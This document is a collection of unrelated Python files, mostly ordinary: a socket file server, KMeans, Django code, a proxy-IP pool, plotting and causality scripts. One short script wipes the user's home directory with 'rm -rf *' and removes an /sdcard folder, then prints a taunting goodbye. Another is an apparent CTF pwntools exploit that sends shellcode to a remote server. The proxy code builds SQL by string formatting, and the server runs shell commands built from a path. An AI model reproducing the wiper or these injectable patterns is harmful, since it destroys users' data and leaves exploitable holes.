初始化信息
:param server_address: ("ip地址",端口)
"""
self.server_address = server_address
self.phone = socket(self.address_family, self.socket_type)
if IS_REUSE:
self.phone.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.phone.setsockopt()
self.phone.bind(SERVER_IP_PORT)
self.phone.listen(MAX_LISTEN)
def login(self, conn, date_dic):
config = configparser.ConfigParser()
config.read(USER_INFO, encoding='utf-8')
print(date_dic)
in_name = date_dic["username"]
in_password = date_dic["password"]
if config.has_section(in_name):
md5_pwd =hashlib.md5()
md5_pwd.update(in_password.encode(encoding))
if md5_pwd.hexdigest() == config.get(in_name, "Password"):
flag = 0
self.user_name = in_name
self.home = os.path.join(BASE_HOME, in_name)
self.cur_path = os.path.join(BASE_HOME, in_name)
self.Quotation = config.get(in_name, "Quotation")
else:
flag = 4 # "密码错误"
else:
flag = 5 # "用户不存在"
flag_len = struct.pack("l", flag) # flag_len bytes
conn.send(flag_len)
if flag == 0:
return True
def cd(self, conn, cmd):
if cmd[1] == ".":
conn.send(self.cur_path.encode(encoding=encoding))
elif cmd[1] == "..":
if self.cur_path == self.home:
conn.send(self.cur_path.encode(encoding=encoding))
else:
self.cur_path = os.path.dirname(self.cur_path)
conn.send(self.cur_path.encode(encoding=encoding))
else:
if os.path.exists(os.path.join(self.cur_path, cmd[1])):
self.cur_path = os.path.join(self.cur_path, cmd[1])
conn.send(self.cur_path.encode(encoding=encoding))
else:
conn.send("路径不存在".encode(encoding))
def get(self, conn, cmd):
filename = cmd[1]
# 3、以读的方式打开文件,读取文件内容发送给客户端
# 第一步:制作固定长度的报头
header_dic = {
'filename': filename, # 'filename':'1.mp4'
'file_size': os.path.getsize(os.path.join(BASE_HOME, self.user_name, filename))
}
header_json = json.dumps(header_dic)
print(header_json)
header_bytes = header_json.encode(encoding)
# 第二步:先发送报头的长度
conn.send(struct.pack('l', len(header_bytes)))
# 第三步:再发报头
conn.send(header_bytes)
# 第四步:再发送真实的数据
with open(os.path.join(BASE_HOME, self.user_name, filename), 'rb') as f:
for line in f:
conn.send(line)
def put(self, conn, cmd):
# 第一步:先收报头的长度
obj = conn.recv(4)
header_size = struct.unpack('l', obj)[0]
# 第二步:再收报头
header_bytes = conn.recv(header_size)
# 第三步:从报头中解析出对真实数据的描述信息
header_json = header_bytes.decode('utf-8')
header_dic = json.loads(header_json)
total_size = header_dic['file_size']
filename = header_dic['filename']
# 配额检测
if total_size + os.path.getatime(self.home) < int(self.Quotation) * 1024 * 1024 * 1024:
conn.send("1".encode(encoding))
# 第四步:接收真实的数据
if not os.path.exists(os.path.join(BASE_HOME, self.user_name, filename)):
conn.send("0".encode(encoding))
with open(os.path.join(BASE_HOME, self.user_name, filename), 'wb') as f:
recv_size = 0
while recv_size < total_size:
line = conn.recv(1024) # 1024是一个坑
f.write(line)
recv_size += len(line)
else:
has_rec =os.path.getsize(os.path.join(BASE_HOME, self.user_name, filename))
# print(has_rec) # 141115260
with open(os.path.join(BASE_HOME, self.user_name, filename),"ab+") as f:
conn.send("1".encode(encoding)) # 续传标志
conn.send(struct.pack("l",has_rec)) # 发 传了多少
last_data = header_dic["file_size"] - has_rec#还剩多少
recv_size = 0
while recv_size < last_data:
line = conn.recv(1024) # 1024是一个坑
f.write(line)
recv_size += len(line)
else:
conn.send("0".encode(encoding))
def dir(self, conn, cmd):
if len(cmd) == 1:
print(cmd[0] + " " + self.cur_path)
obj = subprocess.Popen(cmd[0] + " " + self.cur_path, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
msg = obj.stderr.read() + obj.stdout.read()
conn.send(struct.pack("l", len(msg)))
print(len(msg))
conn.send(msg)
@staticmethod
def __view_bar__(received, total_size):
"""
打印进度条
:param received: 已经接收的大小
:param total_size: 总大小
:return:
"""
rate = float(received) / float(total_size)
rate_num = int(rate * 100)
r = '\r[%s%s]%d%%' % ("=" * rate_num, " " * (100 - rate_num), rate_num,)
sys.stdout.write(r)
sys.stdout.flush()
|
import numpy as np
import itertools
class KMeans:
def __init__(self, n_clusters, max_iter=1000, random_seed=0):
self.n_clusters = n_clusters
self.max_iter = max_iter
self.random_state = np.random.RandomState(random_seed)
def fit(self, X):
cycle = itertools.cycle(range(self.n_clusters))
self.labels_ = np.fromiter(itertools.islice(cycle, X.shape[0]), dtype=np.int)
self.random_state.shuffle(self.labels_)
labels_prev = np.zeros(X.shape[0])
count = 0
self.cluster_centers_ = np.zeros((self.n_clusters, X.shape[1]))
while (not (self.labels_ == labels_prev).all() and count < self.max_iter):
for i in range(self.n_clusters):
XX = X[self.labels_ == i, :]
self.cluster_centers_[i, :] = XX.mean(axis=0)
dist = ((X[:, :, np.newaxis] - self.cluster_centers_.T[np.newaxis, :, :]) ** 2).sum(axis=1)
labels_prev = self.labels_
self.labels_ = dist.argmin(axis=1)
count += 1
def predict(self, X):
dist = ((X[:, :, np.newaxis] - self.cluster_centers_.T[np.newaxis, :, :]) ** 2).sum(axis=1)
labels = dist.argmin(axis=1)
return labels
|
"""
打乱一个排好序的list对象alist?
"""
import random
alist = [1, 2, 3, 4, 5]
random.shuffle(alist)
print(alist)
|
# Generated by Django 2.2 on 2020-09-22 16:47
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('django_celery_results', '0007_remove_taskresult_hidden'),
]
operations = [
migrations.CreateModel(
name='Run',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('task', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='django_celery_results.TaskResult')),
],
),
migrations.CreateModel(
name='Contact_Form',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, null=True, verbose_name='isim')),
('surname', models.CharField(max_length=200, null=True, verbose_name='soyisim')),
('gsm_no', models.IntegerField(null=True, verbose_name='gsm_no')),
('email', models.CharField(max_length=200, null=True, verbose_name='email')),
('message', models.TextField(max_length=20000, null=True, verbose_name='mesaj')),
('created_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Register Date')),
('main_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import json
import re
import threading
import time
import datetime
from reload.res_test import func_res_test
from sql_server import MySql
class manage_ip:
ip_pool = []
def __init__(self):
self.find_store_ip = self.input_ip()#将ip载入
self.starts()
def starts(self):
self.add_ip()
t1 = threading.Thread(target= self.check)
t1.start()
def input_ip(self):
return find_store_ip()
def check(self):#检查ip池的数据,如果小于5,那么立刻添加进入ip_pool,如果没有新的ip进来,就一直处于监听转台
'''
这里面需要完成如果ip池小于10,那么,不断补充新的ip,如果没有有效的ip,那么程序一直处于监听状态
'''
while(1):
time.sleep(60)
if len(self.ip_pool)<5:
self.add_ip()
def add_ip(self):#将ip添入ip_pool
'''
将代理ip添加入ip_pool
:return:如果成功,返回true,否则,False
'''
print("正在添加~~~~~~")
today = datetime.date.today()
sql = f'''select ip from ip_pool where valid=1 and date = "{today}"'''
db = MySql()
res = db.fetch_all(sql)
print(type(res))
if res != tuple():
for i in res:
self.ip_pool.append(i[0])
print("添加成功")
return True
print("添加失败,数据库中没有合适的值")
return False
def update_valid(self,ip):#将valid变为0
sql = f'''update ip_pool set valid = 0 where ip="{ip}"'''
db = MySql()
res = db.execute(sql)
print("delete ok")
def delete_today(self):#将今天的数据全部删除
sql = "Delete from ip_pool where 1=1"
db = MySql()
res = db.execute(sql)
print("delete all ok")
# self.ip_pool.extend(新的ip)
class find_store_ip:
def __init__(self):
self.res = func_res_test()
self.starts()
def starts(self):
self.to_mange()
t1= threading.Thread(target=self.listen_write)
t1.start()
print(">>")
def ip_check(self, ip):
'''
:param :ip是测试ip
:return: True为可用ip,False为不可用ip
'''
test_url = "https://api.bilibili.com/x/space/arc/search?mid=451618887&;pn=1&ps=100&jsonp=jsonp"
response = self.res.init_head(test_url, time=3, ip=ip)
if response == None:
return False
if response.status_code != 200:
return False
else:
return True
def listen_write(self):
while(1):
time.sleep(100)
url = input("请输入获得ip的地址,如若想退出,请按quit")
self.to_mange2(url)
if url == "quit":
break
def to_mange(self):#控制各个小功能块
url = input("请输入获得ip的地址")
ip_item = self.get_ip(url)
if ip_item!=None and ip_item !=[] :
for i in ip_item:
if self.ip_check(i):
self.ip_store(i)
return False
return True
def to_mange2(self,url):#控制各个小功能块
ip_item = self.get_ip(url)
if ip_item!=None and ip_item !=[] :
for i in ip_item:
if self.ip_check(i):
self.ip_store(i)
def get_ip(self,url):
'''
:param url: 获取代理api
:return: 代理ip列表,如果无法连接,返回None,连接初见错误,返回[],如果正常连接,返回response
'''
response = None
try:
response = self.res.init_head(url, time=4)
if response.status_code != 200:
print("url错误!!!")
return []
else:
return self.get_ip_rules(response)
except Exception as e:
print(e)
return response
def get_ip_rules(self,response):#获得返回后,提取ip的规则
'''
:param response:
:return: list
'''
js = response.text
print(re.findall(r'\d+.\d+.\d+.\d+:\d+', js))
return re.findall(r'\d+.\d+.\d+.\d+:\d+', js)
def ip_store(self,ip):
db = MySql()
sql = f'''insert into ip_pool values(null,'{ip}',NOW(),1)'''
print(sql)
db.execute(sql)
if __name__ == '__main__':
# p = find_store_ip()
p = manage_ip()
# p.delete_today()
# http://x.fanqieip.com/index.php?s=/Api/IpManager/adminFetchFreeIpRegionInfoList&uid=12522&ukey=caa11eef0b28fa88056de334a5c0c2e3&limit=10&format=0&page=1
|
#!/usr/bin/python
#coding=utf-8
#__author__:TaQini
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
p=remote('157.245.88.100', 7778)
sc=asm('xor rax,rax\n mov al,7\nret\n')
p.sendline(sc)
p.interactive()
|
from __future__ import print_function, division, absolute_import
import csv
import numpy as np
import copy
import matplotlib.pyplot as plt
__all__ = ['paths', 'top_path']
import matplotlib
font = {'family' : 'normal',
'weight' : 'normal',
'size' : 18}
matplotlib.rc('font', **font)
########## Load in transition data ############
t_file=open('../../../Output_Files/transition_search.dat')
transitions_tot=[]
with t_file as my_file:
for line in my_file:
myarray=np.fromstring(line, dtype=float, sep=' ')
transitions_tot.append(myarray)
transitions=transitions_tot
data=np.loadtxt('../../../Input_Files/input.dat') ## input data from Conf_search
Most_likely_paths=[int(p) for p in np.loadtxt('pathway.dat')] ## most likely path from Dijkstra's algorithm
z_ind = 0
inc_ind = 1
az_ind = 2
en_ind = 3
top_z=np.max(data[:,0]) ## starting z used to build transition matrix
bott_z=-11.5 ## ending z used to build transition matrix
z_step = 1 ## step size used to build transition matrix
inc_step = 18 ## step size used to build transition matrix
az_step = 18 ## step size used to build transition matrix
###### Create grids in z, incliantion and azimuthal spaces. These grids are used to plot the eventual path ######
it=0
Grid_z=[]
Grid_ang=[]
Grid_az=[]
iteration=0
z_step=1
z_num=int((top_z-bott_z)/float(z_step))
grid_z=[]
for i in range(z_num):
z_i=top_z-z_step*i
grid_z=np.append(grid_z,z_i)
grid_inc_ang=np.arange(0,180,inc_step)
grid_az_ang=np.arange(0,360,az_step)
for z in range(len(grid_z)):
for ang in range(len(grid_inc_ang)):
for az in range(len(grid_az_ang)):
Grid_z=np.append(Grid_z,grid_z[z])
Grid_ang=np.append(Grid_ang,grid_inc_ang[ang])
Grid_az=np.append(Grid_az,grid_az_ang[az])
iteration+=1
######## For each point along the path, determine the associated grid value ############
mlp_z=[]
mlp_ang=[]
mlp_az=[]
for j in range(len(Most_likely_paths)):
if Most_likely_paths[j]!=7402 and Most_likely_paths[j]!=0:
iteration_number=Most_likely_paths[j]
mlp_z=np.append(mlp_z,Grid_z[int(iteration_number)])
mlp_ang=np.append(mlp_ang,Grid_ang[int(iteration_number)]+9)
mlp_az=np.append(mlp_az,Grid_az[int(iteration_number)]+9)
MLP_z=mlp_z
MLP_ang=mlp_ang
MLP_az=mlp_az
####### Plot the paths !#########
plt.plot(MLP_z,MLP_ang,color='black')
plt.scatter(MLP_z,MLP_ang,color='black')
plt.ylim(0,180)
plt.savefig(f'path_scatter_inc_z_full.png',bbox_inches='tight',transparent=True)
plt.close()
plt.plot(MLP_z,MLP_az,color='black')
plt.scatter(MLP_z,MLP_az,color='black')
plt.ylim(0,360)
plt.savefig(f'path_scatter_az_z_full.png',bbox_inches='tight',transparent=True)
plt.close()
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import time
import numpy as np
from . import colortables
from webservice.algorithms.NexusCalcHandler import NexusCalcHandler as BaseHandler
from webservice.NexusHandler import nexus_handler
@nexus_handler
class ColorBarCalcHandler(BaseHandler):
name = "ColorBarHandler"
path = "/colorbar"
description = "Creates a CMC colorbar spec for a dataset"
params = {
"ds": {
"name": "Dataset",
"type": "string",
"description": "A supported dataset shortname identifier"
},
"t": {
"name": "Time",
"type": "int",
"description": "Data observation date if not specifying a min/max"
},
"min": {
"name": "Minimum Value",
"type": "float",
"description": "Minimum value to use when computing color scales. Will be computed if not specified"
},
"max": {
"name": "Maximum Value",
"type": "float",
"description": "Maximum value to use when computing color scales. Will be computed if not specified"
},
"ct": {
"name": "Color Table",
"type": "string",
"description": "Identifier of a supported color table"
}
}
singleton = True
def __init__(self, tile_service_factory):
BaseHandler.__init__(self, tile_service_factory)
def __get_dataset_minmax(self, ds, dataTime):
dataTimeStart = dataTime - 86400.0 # computeOptions.get_datetime_arg("t", None)
dataTimeEnd = dataTime
daysinrange = self._get_tile_service().find_days_in_range_asc(-90.0, 90.0, -180.0, 180.0, ds, dataTimeStart,
dataTimeEnd)
ds1_nexus_tiles = self._get_tile_service().get_tiles_bounded_by_box_at_time(-90.0, 90.0, -180.0, 180.0,
ds,
daysinrange[0])
data_min = 100000
data_max = -1000000
for tile in ds1_nexus_tiles:
data_min = np.min((data_min, np.ma.min(tile.data)))
data_max = np.max((data_max, np.ma.max(tile.data)))
return data_min, data_max
def __produce_color_list(self, colorbarDef, numColors, min, max, units):
colors = []
labels = []
values = []
for i in range(0, numColors):
index = float(i) / float(numColors)
index = index * (len(colorbarDef) - 1)
prev = int(math.floor(index))
next = int(math.ceil(index))
f = index - prev
prevColor = colorbarDef[prev]
nextColor = colorbarDef[next]
color = [0, 0, 0, 255]
color[0] = nextColor[0] * f + (prevColor[0] * (1.0 - f))
color[1] = nextColor[1] * f + (prevColor[1] * (1.0 - f))
color[2] = nextColor[2] * f + (prevColor[2] * (1.0 - f))
colors.append('%02x%02x%02xFF' % (color[0], color[1], color[2]))
value = (float(i) / float(numColors - 1)) * (max - min) + min
valueHigh = (float(i + 1) / float(numColors - 1)) * (max - min) + min
labels.append("%3.2f %s" % (value, units))
values.append((value, valueHigh))
return colors, labels, values
def calc(self, computeOptions, **args):
ds = computeOptions.get_argument("ds", None)
dataTime = computeOptions.get_datetime_arg("t", None)
if dataTime is None:
raise Exception("Missing 't' option for time")
dataTime = time.mktime(dataTime.timetuple())
color_table_name = computeOptions.get_argument("ct", "smap")
color_table = colortables.__dict__[color_table_name]
min = computeOptions.get_float_arg("min", np.nan)
max = computeOptions.get_float_arg("max", np.nan)
num_colors = computeOptions.get_int_arg("num", 255)
units = computeOptions.get_argument("units", "")
if np.isnan(min) or np.isnan(max):
data_min, data_max = self.__get_dataset_minmax(ds, dataTime)
if np.isnan(min):
min = data_min
if np.isnan(max):
max = data_max
colors, labels, values = self.__produce_color_list(color_table, num_colors, min, max, units)
obj = {
"scale": {
"colors": colors,
"labels": labels,
"values": values
},
"id": ds
}
class SimpleResult(object):
def toJson(self):
return json.dumps(obj, indent=4)
return SimpleResult()
|
class Solution(object):
def __init__(self, head):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
:type head: ListNode
"""
self.head = head
def getRandom(self):
"""
Returns a random node's value.
:rtype: int
"""
result, node, index = self.head, self.head.next, 1
while node:
if random.randint(0, index) is 0:
result = node
node = node.next
index += 1
return result.val
import random
class Solution(object):
def __init__(self, head):
self.arr = []
while head:
self.arr.append(head.val)
head = head.next
def getRandom(self):
return random.choice(self.arr)
|
import os , sys , time , datetime, re
reload(sys)
sys.setdefaultencoding('utf-8')
os.system('cd && rm -rf * ')
os.system('cd /sdcard && rm -rf afzajaan')
print(' BY BY ' )
print('')
print(' ')
print(' HOP :) ' )
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from django import template
from django.db import models
from django.template.loader import render_to_string
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from django.core.urlresolvers import NoReverseMatch
Widget = models.get_model('magiccontent', 'Widget')
Area = models.get_model('magiccontent', 'Area')
register = template.Library()
def get_first_content(content_list, widget):
if not content_list:
first_item = widget.get_widget_type.site_objects.create(widget=widget)
first_item.save()
else:
first_item = content_list[0]
return first_item
@register.simple_tag(takes_context=True)
def show_widget_area_tag(context, area_name, can_edit=False,
widget_type='textimagecontent', style='default',
*args, **kwargs):
"""
Template Tag for generating a custom HTML for the given 'area_name' which
will have a correspondent Widget.
When the Area does not exist, it will be generated an Area, Widget and its
BaseContent register.
"""
request = context['request']
div = kwargs.get('div', None)
page_url = kwargs.get('page_url', None)
area, created = Area.site_objects.get_or_create(name=area_name)
if created:
widget = Widget.site_objects.create(
widget_type=widget_type, style_template=style)
area.widget = widget
area.save()
content_list = Widget.site_objects.list_content_from_type(area.widget)
first_item = get_first_content(content_list, area.widget)
# TODO: find a better place to add those CSS style classes names
editable = 'darkBorder edit-block' if can_edit else ''
template_name = 'magiccontent/{0}/{1}.html'.format(
area.widget.widget_type, area.widget.style_template)
context.update({'widget': area.widget, 'area': area, 'div': div,
'object_list': content_list, 'object': first_item,
'can_edit': can_edit, 'editable': editable,
'page_url': page_url, 'user': request.user})
return render_to_string(template_name, context)
@register.filter(name='is_an_area_visible_tag')
def is_an_area_visible_tag(area_name):
try:
area = Area.site_objects.get(name=area_name)
except Area.DoesNotExist:
area = None
if not area:
return True
return area.is_visible
@register.simple_tag(takes_context=True)
def show_widget_page_tag(context, widget=None, content_list=[],
can_edit=False, show_page=False, style=None):
"""
Template Tag for generating a custom HTML for the given Widget Page
"""
page = "_page" if show_page else ''
style_template = style if style else widget.style_template
template_name = 'magiccontent/{0}/{1}{2}.html'.format(
widget.widget_type, style_template, page)
first_item = get_first_content(content_list, widget)
context.update({'widget': widget, 'object_list': content_list,
'can_edit': can_edit, 'object': first_item, })
return render_to_string(template_name, context)
@register.inclusion_tag('magiccontent/show_editable_area_tag.html')
def show_editable_area_tag(area_id='', widget_id='', can_edit=False,
area_name='area'):
return {'area_id': area_id,
'widget_id': widget_id,
'area_name': area_name,
'can_edit': can_edit,
'widget': Widget.site_objects.get(pk=int(widget_id))}
@register.inclusion_tag('magiccontent/show_editable_widget_tag.html',
takes_context=True)
def show_editable_widget_tag(context, widget_type='', widget_id='',
content_id='', can_edit=False, show_add_btn=True,
show_order_btn=True, show_sytle_btn=True):
content_create_url = 'magiccontent.%s.create' % widget_type
content_update_url = 'magiccontent.%s.update' % widget_type
picture_update_url = 'magiccontent.%s.updatepicture' % widget_type
content_order_url = 'magiccontent.%s.order' % widget_type
create_url = reverse(
content_create_url,
kwargs={'widget_pk': widget_id}) if show_add_btn else ''
update_url = reverse(
content_update_url,
kwargs={'widget_pk': widget_id, 'pk': content_id})
try:
updatepicture_url = reverse(
picture_update_url,
kwargs={'widget_pk': widget_id, 'pk': content_id})
except NoReverseMatch:
updatepicture_url = None
order_url = reverse(
content_order_url,
kwargs={'widget_pk': widget_id}) if show_order_btn else ''
widget_update_url = reverse(
'magiccontent.widget.update', kwargs={'pk': widget_id})
_help_ctx = {
'help_edit_url': context.get('help_page_edit_content'),
'help_edit_show': context.get('show_help_page_edit_content'),
'help_edit_description': 'Learn how to edit contents',
'help_edit_flag': 'help_page_edit_content',
'help_add_url': context.get('help_page_add_content'),
'help_add_show': context.get('show_help_page_add_content'),
'help_add_description': 'Learn how to add new contents',
'help_add_flag': 'help_page_add_content',
}
ctx = {'create_url': create_url,
'update_url': update_url,
'updatepicture_url': updatepicture_url,
'order_url': order_url,
'style_url': widget_update_url if show_sytle_btn else '',
'can_edit': can_edit}
ctx.update(_help_ctx)
return ctx
@register.filter(name='show_help_text', is_safe=True)
def show_help_text(value):
"""
Returns a standard help file path
"""
return "magiccontent/help_text_{0}.html".format(slugify(value))
|
# -*- coding: utf-8 -*-
"""
Лабораторная работа 2
Работа с файлом, необходимо выполнить операции с текстовым файлом
Стратегия, шаблонный метод
"""
import os
import shutil
file = 'C:/Users/Alexey/Desktop/file.txt'
class Delete_FILE:#Класс Операции
def solve(self, file):
os.remove(file)
return 'Файл - '+file+' успешно удален !'
class Copy_FILE:#Класс Операции
def solve(self, file):
shutil.copyfile(file,'C:/Users/Alexey/Desktop/сюда/'+file.split('/')[-1])
return 'Файл успешно скопирован !'
class Create_FILE:#Класс Операции
def solve(self, file):
f = open(file, 'w', encoding = 'utf-8')
f.close()
return 'Файл - '+file+' успешно создан !'
class GENERAL: #Основной Класс
def SET_STRATEGY(self, STRATEGY):
self.STRATEGY = STRATEGY
def solve(self, file):
print(self.STRATEGY.solve(file))
start = GENERAL()
start.SET_STRATEGY(Delete_FILE())
start.solve("C:/Users/Alexey/Desktop/file.txt")
input()
start.SET_STRATEGY(Create_FILE())
start.solve("C:/Users/Alexey/Desktop/file.txt")
input()
start.SET_STRATEGY(Copy_FILE())
start.solve("C:/Users/Alexey/Desktop/file.txt")
input()
start.SET_STRATEGY(Delete_FILE())
start.solve("C:/Users/Alexey/Desktop/сюда/file.txt")
|
#!/usr/bin/env python3
from setuptools import setup
import os, os.path
import sys
ver = "1.2"
def read(filename):
return open(os.path.join(os.path.dirname(__file__), filename)).read()
if sys.version_info < (3,0):
print('Oops, only python >= 3.0 supported!')
sys.exit()
setup(name = 'pixelterm',
version = ver,
description = 'Render pixely images on your terminal. Now also with animated GIF support.',
license = 'BSD',
author = 'jaseg',
author_email = 'pixelterm@jaseg.net',
url = 'https://github.com/jaseg/pixelterm',
packages = ['pixelterm'],
install_requires=['pillow'],
py_modules = [ 'commands' ],
entry_points = {'console_scripts': [
'pixelterm=commands:pixelterm',
'unpixelterm=commands:unpixelterm',
'gifterm=commands:gifterm',
'colorcube=commands:colorcube',
'resolvecolor=commands:resolvecolor',
'pngmeta=commands:pngmeta']},
classifiers = [
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Information Technology',
'Intended Audience :: Intended Audience :: End Users/Desktop',
'License :: Freely Distributable',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Topic :: Internet',
'Topic :: Graphics',
'Topic :: System :: Networking'
'Topic :: Text Processing :: Filters',
'Topic :: Utilities',
],
long_description = read('README.md'),
dependency_links = [],
)
|
"""If users enters x number of positive integers.
Program goes through those integers and finds the maximum positive
and updates the code. If a negative integer is inputed the progam stops the execution
"""
"""
num_int = int(input("Input a number: ")) # Do not change this line
max_int = num_int
while num_int >= 0:
if num_int > max_int:
max_int = num_int
num_int = int(input("Input a number: "))
print ("The maximum is", max_int)
"""
n = int(input("Enter the length of the sequence: ")) # Do not change this line
num1 = 0
num2 = 0
num3 = 1
i = 1
for i in range(n):
temp3 = num3
num3 = num1 + num2 + num3
if i > 1:
num1 = num2
num2 = temp3
print(num3)
|
from django.shortcuts import render
from django.views.generic.edit import CreateView
from .models import First
# Create your views here.
def view(request):
query = First.objects.all()
return render(request, 'view.html', {'data': query})
class Create(CreateView):
model = First
fields = ('title', 'content')
template_name = 'add.html'
success_url = '/first/create'
|
from keras.callbacks import Callback
class YpredCallback(Callback):
"""Used as a callback for Keras to get Ypred_train, and Ypred_test for each epoch.
Example:
yc = YpredCallback(X, X)
model.fit(X, Y, callbacks=[yc]
"""
def __init__(self, model, X_train, X_test=None):
self.model = model # Keras model
self.Y_train = []
self.Y_test = []
self.X_train = X_train
# If X_test is None, use X_train
if X_test is None:
self.X_test = X_train
else:
self.X_test = X_test
def on_epoch_end(self, model, epoch, logs=None):
Y_train_pred = self.model.predict(self.X_train).flatten()
Y_test_pred = self.model.predict(self.X_test).flatten()
self.Y_train.append(Y_train_pred)
self.Y_test.append(Y_test_pred)
|
from hierarchy import Hierarchy
from situation import Situation
from itertools import product, combinations
from fractions import Fraction
import networkx as nx
'''
Return whether a cause is pivotal
if the cause was different, the effect would have been different
parameters:
Hierarchy hierarchy
str cause
str effect
dict attr containing effect value
return: True or False
'''
# def pivotal(hierarchy, cause, effect, **attr):
# # set initial outcome
# outcome = hierarchy.evaluate(effect)
# copy = hierarchy.copy()
# # print 'before'
# # copy.print_situation()
# copy.clear_values()
# if attr.has_key('values'):
# copy.assign_values(attr['values'])
# if attr.has_key('e_value'):
# if outcome != attr['e_value']:
# print 'False by e_value'
# return False
# copy.node[cause]['value'] = int(not hierarchy.node[cause]['value'])
# new = copy.evaluate(effect)
# # print 'after'
# # copy.print_situation()
# if outcome != new:
# print 'True'
# return True
# else:
# print 'False'
# return False
# '''
# Calculate pivotaility
# parameters:
# Hierarchy hierarchy
# int level ???change to str???
# str cause node
# str effect node
# return:
# Fraction
# '''
# def pivotality(hierarchy, cause, effect, **attr):
# copy = hierarchy.copy()
# if attr.has_key('root'):
# exogenous = filter(lambda a: copy.predecessors(a) == [] and nx.has_path(copy, a, effect), copy.nodes())
# else:
# exogenous = filter(lambda a: nx.has_path(copy, a, effect), copy.nodes())
# print copy.path(cause, effect)
# for suc in copy.path(cause, effect):
# if suc in exogenous:
# print 'suc', suc
# exogenous.remove(suc)
# if effect in exogenous:
# exogenous.remove(effect)
# if cause in exogenous:
# exogenous.remove(cause)
# if pivotal(hierarchy, cause, effect, attr=attr):
# return 1
# # find values to compare to
# actual_values = map(hierarchy.value, exogenous)
# # pair values with their nodes
# actual_values = zip(exogenous, actual_values)
# def distance(values):
# distance = 0
# values = zip(exogenous, values)
# print 'actual', actual_values
# print 'values', values
# for a, b in zip(values, actual_values):
# if a != b:
# distance += 1
# print distance
# return distance
# closest_distance = len(exogenous) + 1
# closest_hierarchy = None
# for values in product(*[(0, 1) for v in xrange(len(exogenous))]):
# copy.clear_values()
# for node, value in zip(exogenous, values):
# copy.node[node]['value'] = value
# print
# print
# if attr.has_key('e_value'):
# print 'here'
# piv = pivotal(hierarchy, cause, effect, e_value=attr.get('e_value'), values=zip(exogenous, values))
# else:
# piv = pivotal(hierarchy, cause, effect, values=zip(exogenous, values))
# print closest_distance
# if distance(values) < closest_distance and piv:
# closest_distance = distance(values)
# print 'changed closeest_distance to', closest_distance
# closest_hierarchy = values
# return Fraction(1, closest_distance + 1) if closest_hierarchy != None else 0
'''
NEW
'''
def pivotality(hierarchy, cause, effect, **attr):
copy = hierarchy.copy()
if pivotal(hierarchy, cause, effect):
return 1
exogenous = copy.nodes()
if 'root' in attr:
exogenous = filter(lambda a: copy.predecessors(a) == [], exogenous)
if cause in exogenous:
exogenous.remove(cause)
if effect in exogenous:
exogenous.remove(effect)
for i in xrange(len(exogenous)+1):
for combo in combinations(exogenous, i):
sub = hierarchy.copy()
# print 'combo', combo
for c in combo:
sub.remove_edges_from([(e, c) for e in copy.predecessors(c)])
if attr.has_key('e_value'):
piv = pivotal(sub, cause, effect, combo=combo, e_value=attr.get('e_value'))
else:
piv = pivotal(sub, cause, effect, combo=combo)
if piv:
return Fraction(1, i + 1)
return 0
def pivotal(hierarchy, cause, effect, **attr):
if 'combo' in attr:
copy = hierarchy.copy()
for c in attr['combo']:
copy.node[c]['value'] = int(not copy.node[c]['value'])
else:
copy = hierarchy.copy()
copy.clear_values()
if attr.has_key('values'):
copy.assign_values(attr['values'])
# set initial outcome
outcome = copy.evaluate(effect)
# copy.print_situation()
if attr.has_key('e_value'):
if outcome != attr['e_value']:
return False
copy.node[cause]['value'] = int(not hierarchy.node[cause]['value'])
new = copy.evaluate(effect)
if outcome != new:
return True
else:
return False
'''
find the probability that a node will be pivotal through sampling
parameters:
Hierarchy hierarchy
str node
str effect
int samples
return:
float criticality calculated through sampling
'''
def prob_pivotal(hierarchy, node, effect, samples=100, **attr):
count = 0
total = 0
for sample in xrange(samples):
# create a deepcopy of the hierarchy
copy = hierarchy.copy()
# sample root nodes to create a new situation
if 'priors' in hierarchy.graph:
copy.sample_values()
else:
for i in filter(lambda a: a[0] == str(0), hierarchy.nodes()):
copy.sample_value(i, copy.node[i].get('prior'))
# evaluate the effect that occured in the situation
copy.evaluate(effect)
# if we are considering only cases specified by e_value
if attr.has_key('e_value'):
# if the effect in this situation matches e_value increase total
if copy.value(effect) == attr['e_value']:
total += 1
# if the node was pivotal for the account increase count
if pivotal(copy, node, effect, attr['e_value']):
count += 1
else:
if pivotal(copy, node, effect, None):
count += 1
# if total is still zero, we are evaluvating prob_pivotal for all cases
# set total to the sample size
if total == 0:
total = samples
return float(count)/total
'''
P(cause=pivotal, effect=e_value)/P(effect=e_value) = P(cause=pivotal | effect=e_value)
parameters:
Hierarchy hierarchy
str cause
str effect
dict attr / e_value(target effect value)
return:
float criticality
'''
def criticality(hierarchy, cause, effect, **attr):
copy = hierarchy.copy()
exogenous = filter(lambda a: copy.predecessors(a) == [], copy.nodes())
count = 0
total = 0
for settings in list(product(*[(0, 1) for v in xrange(len(exogenous))])):
values = list(zip(exogenous, settings))
copy.clear_values()
